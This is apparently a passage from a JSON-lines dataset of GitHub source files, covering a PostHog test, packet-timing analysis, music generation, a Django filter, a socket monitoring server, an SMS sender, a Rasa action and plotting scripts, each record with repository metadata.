self.assertRaises(ValidationError):\n text = Text.objects.create(team=self.team, body=\"I am a text\")\n tile = DashboardTile.objects.create(dashboard=self.dashboard, text=text, **invalid_text_tile_field)\n tile.clean()\n","repo_name":"PostHog/posthog","sub_path":"posthog/models/test/test_dashboard_tile_model.py","file_name":"test_dashboard_tile_model.py","file_ext":"py","file_size_in_byte":3132,"program_lang":"python","lang":"en","doc_type":"code","stars":14422,"dataset":"github-code","pt":"53"} +{"seq_id":"5476852084","text":"# Author : Patrik Nemeth (xnemet04)\n# Email : xnemet04@stud.fit.vutbr.cz\n\nimport argparse\nfrom cgitb import small\nimport numpy as np\nimport pickle\nimport sys\n\nfrom lib import *\n\n#-#-#-#-#-#-#-#-#-#-#\n # MAIN 
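# Quick checks for the babbling solution above: a word counts only when it
# is built from "aya", "ye", "woo", "ma" with no syllable doubled
# back-to-back (assuming the solution function above is in scope).
assert solution(["aya", "yee", "u", "maa"]) == 1   # only "aya" qualifies
assert solution(["ayaye", "uuu", "yayae"]) == 1    # "ayaye" = "aya" + "ye"
assert solution(["yeye", "woowoo"]) == 0           # doubled syllables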
#\n #-#-#-#-#-#-#-#-#-#-#\n\nparser = argparse.ArgumentParser()\nparser.add_argument('-s', nargs=1, help=\"parse an input pcap file and output 2 csv files with time data split between master / slave\")\nparser.add_argument('-a', nargs=2, help=\"analyze and generate a model based on 2 input csv files in the order master slave\")\nargs = parser.parse_args()\n\nif len(sys.argv) < 2:\n print(\"Program requires exactly one option.\")\n parser.print_help()\n exit(1)\n\nif args.s:\n save_csv_data(args.s[0], \"master.csv\", \"slave.csv\")\n exit(0)\n\n\nmaster = {}\nslave = {}\n\n###### ######\n# Get the times of packets relative to the start of the communication\nmaster['times'], slave['times'] = load_csv_data(args.a[0], args.a[1], 0.66)\n\n###### ######\n# Get 5 minute windows\nwindow_in_minutes = 5\nwindow_in_seconds = window_in_minutes * 60\n\n# Master windows\ncnt = 1\nmaster['windows'] = [[]]\nfor t in master['times']:\n if t <= cnt * window_in_seconds:\n master['windows'][cnt-1].append(t)\n else:\n cnt += 1\n master['windows'].append([])\n# Slave windows\ncnt = 1\nslave['windows'] = [[]]\nfor t in slave['times']:\n if t <= cnt * window_in_seconds:\n slave['windows'][cnt-1].append(t)\n else:\n cnt += 1\n slave['windows'].append([])\n\n###### ######\n# Get time deltas and window sizes\nmaster['deltas'] = time_deltas(master['times'])\nmaster['window_sizes'] = window_sizes(master['windows'])\n\nslave['deltas'] = time_deltas(slave['times'])\nslave['window_sizes'] = window_sizes(slave['windows'])\n\n###### ######\n# Split deltas to window sizes\nmaster['deltas_windowed'] = split_deltas_by_window_sizes(master['deltas'], master['window_sizes'])\nslave['deltas_windowed'] = split_deltas_by_window_sizes(slave['deltas'], slave['window_sizes'])\n\nprint(\"all data windowed...\")\n\n###### ######\n# Get characteristics\nmaster['q1'], master['q2'], master['q3'] = np.quantile(master['deltas'], [0.25, 0.5, 0.75])\nmaster['mean'] = np.mean(master['deltas'])\n\nslave['q1'], slave['q2'], slave['q3'] = np.quantile(slave['deltas'], [0.25, 0.5, 0.75])\nslave['mean'] = np.mean(slave['deltas'])\n\n###### ######\n# Get number of packets per window for split points\nmaster['q1_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['q1'])\nmaster['q2_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['q2'])\nmaster['q3_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['q3'])\nmaster['mean_sizes'] = size_characteristics_for_split_point(master['deltas_windowed'], master['mean'])\nslave['q1_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['q1'])\nslave['q2_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['q2'])\nslave['q3_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['q3'])\nslave['mean_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['mean'])\n\n###### ######\n# Get the best split point\nmaster['split_point'] = choose_best_split_point(\n master['q1_sizes'], master['q1'],\n master['q2_sizes'], master['q2'],\n master['q3_sizes'], master['q3'],\n master['mean_sizes'], master['mean']\n )\nslave['split_point'] = choose_best_split_point(\n slave['q1_sizes'], slave['q1'],\n slave['q2_sizes'], slave['q2'],\n slave['q3_sizes'], slave['q3'],\n slave['mean_sizes'], slave['mean']\n )\n\n###### ######\n# Get number of packets per window for the chosen best split point\nmaster['best_split_sizes'] = 
size_characteristics_for_split_point(master['deltas_windowed'], master['split_point'])\nslave['best_split_sizes'] = size_characteristics_for_split_point(slave['deltas_windowed'], slave['split_point'])\n\n###### ######\n# Get the final 4-tuple, that describes the analyzed communication\nmaster_all = {}\nmaster_lt_split = {}\nmaster_geq_split = {}\n\nslave_all = {}\nslave_lt_split = {}\nslave_geq_split = {}\n\nmaster_all['mean'] = np.mean(master['best_split_sizes']['all'])\nmaster_all['std'] = np.std(master['best_split_sizes']['all'])\nmaster_lt_split['mean'] = np.mean(master['best_split_sizes']['lt_split'])\nmaster_lt_split['std'] = np.std(master['best_split_sizes']['lt_split'])\nmaster_geq_split['mean'] = np.mean(master['best_split_sizes']['geq_split'])\nmaster_geq_split['std'] = np.std(master['best_split_sizes']['geq_split'])\n\nslave_all['mean'] = np.mean(slave['best_split_sizes']['all'])\nslave_all['std'] = np.std(slave['best_split_sizes']['all'])\nslave_lt_split['mean'] = np.mean(slave['best_split_sizes']['lt_split'])\nslave_lt_split['std'] = np.std(slave['best_split_sizes']['lt_split'])\nslave_geq_split['mean'] = np.mean(slave['best_split_sizes']['geq_split'])\nslave_geq_split['std'] = np.std(slave['best_split_sizes']['geq_split'])\n\nmaster_final_tuple = (\n master['split_point'],\n (master_all['mean'] - 3 * master_all['std'], master_all['mean'] + 3 * master_all['std']),\n (master_lt_split['mean'] - 3 * master_lt_split['std'], master_lt_split['mean'] + 3 * master_lt_split['std']),\n (master_geq_split['mean'] - 3 * master_geq_split['std'], master_geq_split['mean'] + 3 * master_geq_split['std'])\n)\n\nslave_final_tuple = (\n slave['split_point'],\n (slave_all['mean'] - 3 * slave_all['std'], slave_all['mean'] + 3 * slave_all['std']),\n (slave_lt_split['mean'] - 3 * slave_lt_split['std'], slave_lt_split['mean'] + 3 * slave_lt_split['std']),\n (slave_geq_split['mean'] - 3 * slave_geq_split['std'], slave_geq_split['mean'] + 3 * slave_geq_split['std'])\n)\n\nwith open(\"master_model.pkl\", \"wb\") as f:\n pickle.dump(master_final_tuple, f)\n\nwith open(\"slave_model.pkl\", \"wb\") as f:\n pickle.dump(slave_final_tuple, f)\n\nplot(\n master['best_split_sizes']['all'],\n master['best_split_sizes']['lt_split'],\n master['best_split_sizes']['geq_split'],\n master_final_tuple,\n #\"from-master\"\n )\nplt.show()\nplt.clf()\nplot(\n slave['best_split_sizes']['all'],\n slave['best_split_sizes']['lt_split'],\n slave['best_split_sizes']['geq_split'],\n slave_final_tuple,\n #\"to-master\"\n )\nplt.show()\n","repo_name":"pemeth/pds-project","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41512455298","text":"import _settings\nfrom abjad import *\nfrom calliope.bubbles import *\nfrom calliope.material import *\n\nclass GenLine(Line):\n gen_pitches = (\n ( 2, 0,-1),\n (-5,-3,-1),\n (-5, 0,-3),\n ( 0,-3,-1),\n )\n division_masks = None\n gen_rhythms = (\n (2,2,1), # forward or backword, and the 1 can be extended if at the end/beginning of a longer phrase\n (4,4,1), # forward or backword, and the 1 can be extended if at the end/beginning of a longer phrase\n (4,4,4),\n )\n harmonic_intervals = (7,)\n drone_pitch=-10\n\n pitch_sequence = (0,)\n rhythm_sequence = (0,)\n pitch_directions=(1,)\n rhythm_directions=(1,)\n rhythm_multiplies=(1,)\n octaves = (0,)\n transpose=0\n\n gen_pitch = ()\n gen_rhythm = ()\n duration_meter = ((1,2),)*9\n\n\n def __init__(self, 
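# The model tuples above are 3-sigma intervals around per-window packet
# counts. The bound in isolation, using the same numpy mean/std (ddof=0)
# as the script above:
import numpy as np

def three_sigma_bounds(samples):
    m, s = np.mean(samples), np.std(samples)
    return m - 3 * s, m + 3 * s

lo, hi = three_sigma_bounds([10, 12, 11, 9, 13])
assert lo < 9 and hi > 13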
*args, **kwargs):\n super().__init__(*args, **kwargs)\n \n self.gen_pitch = []\n for i,s in enumerate(self.pitch_sequence):\n self.gen_pitch += self.gen_pitches[s % len(self.gen_pitches)][ ::self.pitch_directions[i % len(self.pitch_directions)] ]\n\n self.gen_pitch = [ p + self.transpose + self.octaves[i % len(self.octaves)]*12 for i,p in enumerate(self.gen_pitch) ]\n\n\n self.gen_rhythm = []\n for i,s in enumerate(self.rhythm_sequence):\n self.gen_rhythm_append = self.gen_rhythms[s % len(self.gen_rhythms)][ ::self.rhythm_directions[i % len(self.rhythm_directions)] ]\n self.gen_rhythm_append_multiply = self.rhythm_multiplies[i % len(self.rhythm_multiplies)]\n if self.gen_rhythm_append_multiply != 1:\n self.gen_rhythm_append = [r * self.gen_rhythm_append_multiply for r in self.gen_rhythm_append]\n self.gen_rhythm += self.gen_rhythm_append\n\n def music(self, **kwargs):\n # my_music = self.container_type()\n # print(self.gen_rhythm)\n # tie_specifier = rhythmmakertools.TieSpecifier(tie_across_divisions=[True, False, False, True])\n\n # TO DO... better rhythm generation here...\n\n if self.gen_rhythm:\n durations = [Duration( (1,d) ) for d in self.gen_rhythm] \n print(durations)\n rhythm_maker = rhythmmakertools.NoteRhythmMaker(\n # tie_specifier=tie_specifier\n )\n rhythm = rhythm_maker(durations)\n logical_ties = select(rhythm).by_logical_tie(pitched=True)\n for i, logical_tie in enumerate(logical_ties):\n for note in logical_tie:\n note.written_pitch = self.gen_pitch[i % len(self.gen_pitch) ]\n my_music = self.container_type(rhythm)\n else:\n my_music = self.container_type()\n return my_music\n\nclass GenBubble(Bubble):\n\n # this checks for pitch swapping... move to Bubble for use in other works?\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n if getattr(self, \"swap_pitches\", None):\n p0 = getattr(self, self.swap_pitches[0]).gen_pitch\n p1 = getattr(self, self.swap_pitches[1]).gen_pitch\n for i in self.swap_pitches[2]:\n (p0[i], p1[i]) = (p1[i], p0[i])\n\n\n# def get_gen_rhythms_line(*args, **kwargs):\n# return Line(\" \".join( get_gen_rhythms(*args, **kwargs) ))\n\n\n\nclass In3Time(Line):\n time_signature = Line( commands=( (\"time 3/4\", \"before\"), ) )\n\nclass PhraseA(GenLine):\n pitch_sequence=(0,1) \n rhythm_sequence=(0,0) \n rhythm_multiplies=(4,2)\n\nclass PhraseB(PhraseA):\n pitch_sequence=(0,2)\n # transpose=7\n\nclass PhraseC(PhraseA):\n pitch_sequence=(3,0)\n pitch_directions=(1,-1) \n rhythm_sequence=(2,1) \n rhythm_multiplies=(1,2)\n\nclass GenerationTestMusic(Bubble):\n line1 = GenLine(pitches=(0,1), rhythms=(0,1))\n\nclass GenerationLine(Line):\n phrase1 = PhraseA()\n phrase2 = PhraseB()\n phrase3 = PhraseC()\n phrase4 = phrase1\n sequence=(\"phrase1\",\"phrase2\",\"phrase3\",\"phrase4\",)\n\nclass GenerationLineMixup(GenerationLine):\n phrase1 = PhraseC()\n phrase2 = PhraseA()\n phrase3 = phrase2\n phrase4 = PhraseB()\n\nclass SpacePhrases(object):\n pickup = Line(\"r4 r\")\n tail = Line(\"r4\")\n sequence = (\"pickup\",\"phrase1\",\"tail\",\"pickup\",\"phrase2\",\"tail\",\"pickup\",\"phrase3\",\"tail\",\"pickup\",\"phrase4\",\"tail\",)\n\nclass SpaceGenerationLine(SpacePhrases, GenerationLine):\n pass\nclass SpaceGenerationLineMixup(SpacePhrases, GenerationLineMixup):\n pass\n\n# class UpHarmony1(object):\n# def music(self):\n# my_music = super().music()\n# return my_music\n\n# class GenerationLineFifth(UpHarmony1, GenerationLine):\n# pass\n\nclass TestMusic(Bubble):\n line1 = In3Time() + SpaceGenerationLine()\n line2 = In3Time() + 
Tr(line1, 7)\n line3 = In3Time() + SpaceGenerationLineMixup()\n line4 = In3Time() + Tr(line3, 7)\n sequence=(\"line2\",\"line1\", \"line4\", \"line3\")\n\n# m = TestMusic()\n# m.show()\n\n# m = TestMusic()\n# m.show()\n\n# 3 pitch rows\n# 1st row is initial line\n# 2nd row is always a 5th apart\n# create a routine to get the 3rd note\n# create a routine to arrange pitches\n\n# row = [9, 7, 6, 2, -1, 1, 2]\n\n# notes = [Note(p, (1,8)) for p in row]\n# notes2 = [Note(p-7, (1,8)) for p in row]\n# row3 = [row[(i+3) % len(row) ]+7 for i in range(len(row)) ]\n# notes3 = [Note(p, (1,8)) for p in row3]\n\n# st1 = Staff()\n# st1.extend(notes)\n\n# st2 = Staff()\n# st2.extend(notes2)\n\n# st3 = Staff()\n# st3.extend( parse(\"{ R1 }\") )\n\n# sc = Score()\n# sc.append(st3)\n# sc.append(st1)\n# sc.append(st2)\n\n\n# show(sc)\n","repo_name":"mirrorecho/rwestmusic-copper","sub_path":"copper/_bak/bak_generations.py","file_name":"bak_generations.py","file_ext":"py","file_size_in_byte":5502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36260641755","text":"from django.contrib.admin import RelatedFieldListFilter\nfrom django.contrib.admin.utils import get_model_from_relation\nfrom django.core.urlresolvers import reverse\nfrom django.forms.utils import flatatt\nfrom django.utils.encoding import smart_text\nfrom django.utils.html import format_html\n\n\nclass RelatedFieldAjaxListFilter(RelatedFieldListFilter):\n ajax_attrs = None\n\n def has_output(self):\n return True\n\n def field_choices(self, field, request, model_admin):\n app_label = field.related_model._meta.app_label\n model_name = field.related_model._meta.object_name\n\n self.ajax_attrs = format_html('{}', flatatt({\n 'data-app-label': app_label,\n 'data-model': model_name,\n 'data-ajax--url': reverse('jet:model_lookup'),\n 'data-queryset--lookup': self.lookup_kwarg\n }))\n\n if self.lookup_val is None:\n return []\n\n other_model = get_model_from_relation(field)\n if hasattr(field, 'rel'):\n rel_name = field.rel.get_related_field().name\n else:\n rel_name = other_model._meta.pk.name\n\n queryset = field.related_model._default_manager.filter(**{rel_name: self.lookup_val}).all()\n return [(x._get_pk_val(), smart_text(x)) for x in queryset]\n","repo_name":"kelwys/Siscon","sub_path":"jet/filters.py","file_name":"filters.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"31133773448","text":"def dist_calc(idx, pos):\n if idx ==1:\n return pos\n elif idx==2:\n return C + R + C - pos\n elif idx==3:\n return C + R + C + R -pos\n else:\n return C+pos\n\nC,R =map(int,input().split())\ncircumference=(C+R)*2\n\nN=int(input())\ndist=[]\nfor i in range(N+1):\n idx,pos=map(int,input().split())\n dist.append(dist_calc(idx,pos))\n\nmy_dist=dist[-1]\n\nanwwer=0\n\nfor i in range(N):\n clockwise=abs(my_dist-dist[i])\n anwwer+=min(clockwise,circumference-clockwise)\n\nprint(anwwer)\n","repo_name":"SangRakee/AlgoriGym","sub_path":"BOJ/경비원_2564.py","file_name":"경비원_2564.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5150727239","text":"#!/usr/bin/python4\ndef safe_print_list(my_list=[], x=1):\n count = 0\n try:\n for idx, el in enumerate(my_list):\n if idx == x:\n break\n print(\"{}\".format(el), end=\"\")\n count += 1\n except IndexError:\n count = 5\n print()\n return 
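# The core of the BOJ 2564 solution above: positions are unrolled clockwise
# onto the perimeter, and the shorter way round is min(d, perimeter - d).
# As a standalone helper over already-unrolled positions:
def shortest_around(pos_a, pos_b, perimeter):
    d = abs(pos_a - pos_b)
    return min(d, perimeter - d)

assert shortest_around(1, 9, 10) == 2   # wrapping around is shorter
assert shortest_around(2, 5, 10) == 3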
count\n","repo_name":"lijsamuael/alx-higher_level_programming","sub_path":"0x05-python-exceptions/0-safe_print_list.py","file_name":"0-safe_print_list.py","file_ext":"py","file_size_in_byte":306,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38434780498","text":"import socket\nimport struct\nimport threading\nimport time\nimport json\nimport os\n\n\nclass Log():\n '''log类'''\n def __init__(self, log_name):\n if type(log_name) != str:\n raise TypeError('Wrong log_name type, it should be str.')\n self.log_name = log_name + '.log'\n\n def write(self, strings):\n if type(strings) != str:\n raise TypeError('Wrong log string type, it should be str.')\n with open(self.log_name, 'a') as file:\n c_readable_time = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n file.write(c_readable_time + ' ' + strings)\n\n def trash(self):\n with open(self.log_name, 'w') as file:\n trash_warning = 'log deleted by host.'\n file.write(trash_warning)\n\nclass Inbox():\n '''模拟一个支持多线程的socket服务端'''\n\n def __init__(self, port_number):\n '''设置socket基础信息'''\n self.__record = []\n self.__led = False\n self.__s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n self.__s.bind(('', port_number))\n self.__s.listen(5)\n self.__s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n\n def on(self):\n '''将serverDameon函数设置为守护线程,放置在后台运行'''\n def serverDaemon(self):\n '''无限循环接受远程联入信息,转交dataRecv函数处理,并为每一次联入单开一个线程,支持多线程'''\n def dataRecv(self, sock, addr, lock):\n '''获取锁以后,每1024个字节收一次数据包,解析并添加到类属性列表中,同时设置led状态为True,通讯完毕后端口关闭,释放锁'''\n lock.acquire() # 获取进程锁\n dataBuffer = bytes() # 初始化网络数据缓存区\n headerSize = 4 # 规定头信息所占用的字节数\n while True: \n data = sock.recv(1024)\n if data:\n dataBuffer += data\n if len(dataBuffer) < headerSize: # 模拟header信息接收不全的状态,\n continue\n headpack = struct.unpack('!I',dataBuffer[:headerSize]) # header仅包含数据包大小的描述信息\n bodySize = headpack[0]\n if len(dataBuffer) < headerSize + bodySize: # 模拟单次发送信息不全的情况\n continue\n body = dataBuffer[headerSize:headerSize+bodySize]\n decode_data = json.loads(body.decode('utf-8'))\n self.__record.append(decode_data)\n self.__led = True\n dataBuffer = bytes() # 考虑到客户端脚本规定,发送完全部信息后关闭端口,dataBuffer无需处理粘包的情况\n break\n else:\n break\n lock.release()\n sock.close()\n return\n lock = threading.Lock()\n while True:\n sock, addr = self.__s.accept()\n t1 = threading.Thread(target=dataRecv, args=(self, sock, addr, lock))\n t1.start()\n return\n t1 = threading.Thread(target=serverDaemon, args=(self,), daemon=True)\n t1.start() \n\n def led(self):\n '''判断led灯当前状态'''\n return self.__led\n\n def vomit(self):\n '''返回属性类堆栈中的第一条信息'''\n if not self.__record:\n return None\n else:\n if len(self.__record) is 1:\n self.__led = False\n return self.__record.pop(0)\n\nclass DictCompare():\n '''模拟一个比较器,用来比较字典的内容'''\n def __init__(self):\n\n self.increase = []\n self.decrease = []\n self.diff = []\n \n def compare(self, new_item, old_item):\n self.increase = [] # bug fix: log打印重复信息\n self.decrease = [] # bug fix: log打印重复信息\n self.diff = [] # bug fix: log打印重复信息\n\n if not type(old_item) == type(new_item):\n raise ValueError('type error. 
different type cannot be compared.')\n if new_item and old_item:\n for key in new_item:\n if key not in old_item:\n self.increase.append(key)\n else:\n if new_item[key] == old_item[key]:\n continue\n else:\n self.diff.append(key)\n for key in old_item:\n if key not in new_item:\n self.decrease.append(key)\n elif new_item:\n self.increase = list(old_item.keys())\n elif old_item:\n self.decrease = list(new_item.keys())\n\n return self.increase, self.decrease, self.diff \n\n\ndef load_main_dict(main_dict_file):\n '''尝试从本地json文件恢复main_dict,以防止主控以外关闭导致的数据丢失'''\n\n if os.path.exists(main_dict_file):\n with open(main_dict_file, 'r') as main_dict_obj:\n main_dict = json.load(main_dict_obj)\n else:\n main_dict = dict()\n return main_dict\n\ndef process(message):\n if isinstance(message, dict) and \"type\" in message:\n message_type = message.pop(\"type\")\n else:\n raise ValueError(\"message type error, it should be dict and contain 'type' key\")\n \n if message_type == \"monitor\":\n monitor_processor(message)\n elif message_type == \"powercycle\":\n powercycle_processor(message)\n \ndef powercycle_processor(message):\n print('under construction.')\n pass\n\ndef monitor_processor(message):\n '''主字典刷新及log记录操作'''\n identifier = message.pop(\"id\") # id should be timestamp + ip string,\n info_level = message.pop(\"level\") # 0 init 1 update 2 heart_beat\n if info_level is 0:\n sub_init_process(identifier, message)\n elif info_level is 1:\n server_info = message.get(\"server_info\")\n script_info = message.get(\"script_info\")\n ssd_info = message.get(\"ssd_info\")\n if server_info:\n sub_single_dict_process(\"server_info\",server_info,identifier)\n if script_info:\n sub_single_dict_process(\"script_info\",script_info,identifier)\n if ssd_info:\n sub_ssd_process(ssd_info, identifier)\n elif info_level is 2:\n info = '[{0}] ^^^ Alive Detected ^^^'.format(identifier)\n main_log.write(info)\n main_dict.update({identifier : message})\n return\n\ndef sub_init_process(identifier, message):\n # server_info = message.get(\"server_info\")\n ssd_info = message.get(\"ssd_info\")\n info = '====== New Clietn Join ======\\n'\n\n\n for key, value in ssd_info.items():\n info = info + '{0} : {1}\\n'.format(key, value)\n main_log.write(info)\n warning_log.write(info)\n\ndef sub_single_dict_process(single_dict_name, single_dict_info, identifier):\n old_record = main_dict.get(identifier)\n if old_record:\n old_dict_info = old_record.get(single_dict_name)\n increase_key, decrease_key, diff_key = dict_comp.compare(single_dict_info, old_dict_info)\n if increase_key:\n for key in increase_key:\n info = '[{0}] +++ Add Detected +++ [add {1} : {2}]\\n'.format(identifier, key, single_dict_info[key])\n main_log.write(info)\n warning_log.write(info)\n if decrease_key:\n for key in decrease_key:\n info = '[{0}] xxx Remove Detected xxx [remove {1} : {2}]\\n'.format(identifier, key, single_dict_info[key])\n main_log.write(info)\n warning_log.write(info)\n error_log.write(info)\n if diff_key:\n for key in diff_key:\n info = '[{0}] ??? Change Detected ??? 
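# What DictCompare.compare above reports for two snapshots: keys only in
# the new dict land in `increase`, keys only in the old dict in `decrease`,
# and shared keys whose values changed in `diff`.
inc, dec, diff = DictCompare().compare({'a': 1, 'b': 2}, {'a': 1, 'c': 3})
assert inc == ['b'] and dec == ['c'] and diff == []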
[change {1} : {2} ===> {3}\\n]'.format(identifier,key,old_dict_info[key],single_dict_info[key])\n else:\n print('{0} info not found, init client to resend the message.'.format(identifier))\n\n return\n\ndef sub_ssd_process(new_ssd_sum, identifier):\n old_ssd_sum = main_dict[identifier][\"ssd_info\"]\n insert_ssd, eject_ssd, diff_ssd = dict_comp.compare(new_ssd_sum, old_ssd_sum)\n if insert_ssd:\n for bus_num in insert_ssd:\n info = '{0} +++ SSD Insert Detected +++\\n'.format(identifier)\n ssd_detail = new_ssd_sum[bus_num]\n for key, value in ssd_detail.items():\n info += '[{0} : {1}]\\n'.format(key, value)\n print(info)\n main_log.write(info)\n if eject_ssd:\n for bus_num in eject_ssd:\n info = '{0} xxx SSD Eject Detected xxx\\n'.format(identifier)\n ssd_detail = old_ssd_sum[bus_num]\n for key, value in ssd_detail.items():\n info += '[{0} : {1}]\\n'.format(key, value)\n print(info)\n main_log.write(info)\n if diff_ssd:\n head = '{0} --- SSD Info Change Notice ---\\n'.format(identifier)\n bodybox = []\n for bus_num in diff_ssd:\n new_ssd_detail = new_ssd_sum[bus_num]\n old_ssd_detail = old_ssd_sum[bus_num]\n disk_num = new_ssd_detail['disk_num']\n boot = new_ssd_detail['boot']\n pci_num = new_ssd_detail['pci_num']\n sn_num = new_ssd_detail['sn']\n body = '[{0}][{1}][{2}]-{3}-'.format(pci_num,sn_num,disk_num,boot)\n for item in new_ssd_detail:\n if new_ssd_detail[item] != old_ssd_detail[item]:\n if item == 'temperature':\n if int(new_ssd_detail[item][:-1]) < 60: \n continue\n info = ' [{0} : {1} ===> {2}]\\n'.format(item, old_ssd_detail[item], new_ssd_detail[item])\n notice = body + info\n bodybox.append(notice)\n if bodybox:\n print(head)\n main_log.write(head)\n for notice in bodybox:\n print(notice)\n main_log.write(notice)\n else:\n info = '[{0}] ^^^ Alive Detected ^^^\\n'.format(identifier)\n print(info)\n main_log.write(info)\n\n\n# ------ Danger Zone ------ #\nmain_dict_file = 'main_dict.json'\nmonitor_inbox = Inbox(1025) # 建立监控服务器\ndict_comp = DictCompare()\nmain_log = Log('main') # 定义主log\nwarning_log = Log('warning') # 定义警告log\nerror_log = Log('error') # 定义错误log\n\nmonitor_inbox.on() # 开启监控进程\nmain_dict = load_main_dict(main_dict_file) # 读取主数据库\n\nwhile True:\n if monitor_inbox.led():\n message = monitor_inbox.vomit()\n process(message)\n else:\n with open(main_dict_file, 'w') as db:\n json.dump(main_dict, db)\n time.sleep(2)\n","repo_name":"kouyu66/work_shop","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":10900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22643062827","text":"import requests\r\nfrom credentials import *\r\nclass Send_SMS:\r\n def send_text_message(number, message):\r\n url =\"https://api.jive.com/messaging/v1/messages\"\r\n headers={'Content-Type':'application/json', 'Authorization': Authrization.BEARER_TOKEN }\r\n r = requests.post(url,headers=headers ,json = {\"ownerPhoneNumber\": \"+17734823900\", \"contactPhoneNumbers\": [ number ], \"body\": message})\r\n print(r)\r\n\r\n\r\n","repo_name":"zawahirkashif/Handle-Abandon-With-Goto-Connect-API","sub_path":"send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15172908728","text":"# This files contains your custom actions which can be used to run\n# custom Python code.\n#\n# See this guide on how to implement these action:\n# https://rasa.com/docs/rasa/custom-actions\n\n\n# This 
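# The SMS call above is a plain authenticated JSON POST; the same shape
# with requests, shown generically. The URL, token and payload here are
# placeholders, not the real GoTo Connect values.
import requests

def post_json(url, token, payload):
    headers = {'Content-Type': 'application/json',
               'Authorization': 'Bearer %s' % token}
    response = requests.post(url, headers=headers, json=payload, timeout=10)
    response.raise_for_status()
    return response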
is a simple example for a custom action which utters \"Hello World!\"\nimport csv\nfrom pathlib import Path\nfrom typing import Any, Counter, Text, Dict, List\nfrom rasa_sdk import Action, Tracker\nfrom rasa_sdk.executor import CollectingDispatcher\nimport pandas as pd\n\n\n\n\nclass ActionGetMovieOnGenre(Action):\n\n def name(self) -> Text:\n return \"action_get_movie_on_genre\"\n\n def run(self, dispatcher: CollectingDispatcher,\n tracker: Tracker,\n domain: Dict[Text, Any]) -> List[Dict[Text, Any]]:\n\n #getting the slot value and storing into the genres slot value\n genres_slot = tracker.get_slot('genres')\n #reading the csv file\n with open('C:/Users/titio/fyp/prototype/data/imdb_top_1000.csv', 'r', encoding=\"utf-8\") as file:\n reader = csv.DictReader(file)\n #getting a list of movies matching the criteria\n output = [row for row in reader if row['Genre'][0].lower() == genres_slot]\n if output:\n #if the list is not null, return movie title\n reply = f\"Here are some {genres_slot} Movies:\"\n reply += \"\\n-\" + \"\\n-\".join([item['Series_Title'] for item in output])\n dispatcher.utter_message(reply)\n else:\n #if the list is empty, tell user that no matches were found\n dispatcher.utter_message(f\"I couldn't find any {genres_slot} movies\")\n\n\n \n \n\n\n\n\n","repo_name":"TTOlurin/FYP-prototype","sub_path":"actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40802897751","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport csv\nfrom numpy import *\n\nx1 = []\ny1 = []\n\nx2 = []\ny2 = []\n\nx3 = []\ny3 = []\n\nx4 = []\ny4 = []\n\nwith open('mr.out', 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n for row in plots:\n x1.append(float(row[0]))\n y1.append(float(row[1]))\n\nplt.plot(x1, y1, label='Euler')\n\nwith open('rec_stefan.out', 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n for row in plots:\n x2.append(float(row[0]))\n y2.append(float(row[1]))\n\n#plt.plot(x2, y2, 'ro', label='Rec_Stefan')\n\nwith open('log_new', 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n for row in plots:\n x3.append(float(row[0]))\n y3.append(float(row[1]))\n\nplt.plot(x3, y3, 'go', label='Rec_Stefan')\n\nwith open('rec_stefan_rk4.out', 'r') as csvfile:\n plots = csv.reader(csvfile, delimiter=',')\n for row in plots:\n x4.append(float(row[0]))\n y4.append(float(row[1]))\n\n#plt.plot(x4, y4, 'co', label='Rec_Stefan_RK4')\n\n\n#plt.subplot(2,1,1)\n#plt.plot(x1, y1, label='Euler')\n#plt.plot(x2, y2, 'ro', label='Rec_Stefan')\n#plt.plot(x3, y3, 'go', label='Rec_Jan')\n#plt.ylabel('M')\n#plt.legend()\n\n#plt.subplot(2,1,2)\n#plt.plot(x1, y1, label='Euler')\n#plt.plot(x4, y4, 'ro', label='Rec_Stefan_RK4')\n#plt.plot(x3, y3, 'go', label='Rec_Jan')\n#plt.ylabel('M')\n#plt.legend()\n\n\nplt.title('Mass-Radius-Relation\\nReconstruction Algorithms')\nplt.ylabel('M(R)')\nplt.xlabel('R')\nplt.legend()\nplt.show()\n","repo_name":"jroeder-astro/thesis","sub_path":"new/meh.py","file_name":"meh.py","file_ext":"py","file_size_in_byte":1501,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"74189115368","text":"#! 
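# Each file read above is two comma-separated float columns; numpy can load
# and unpack such a file in one call instead of a csv.reader loop. Sketch
# assuming the same data files ('mr.out' etc.) are present.
import numpy as np
import matplotlib.pyplot as plt

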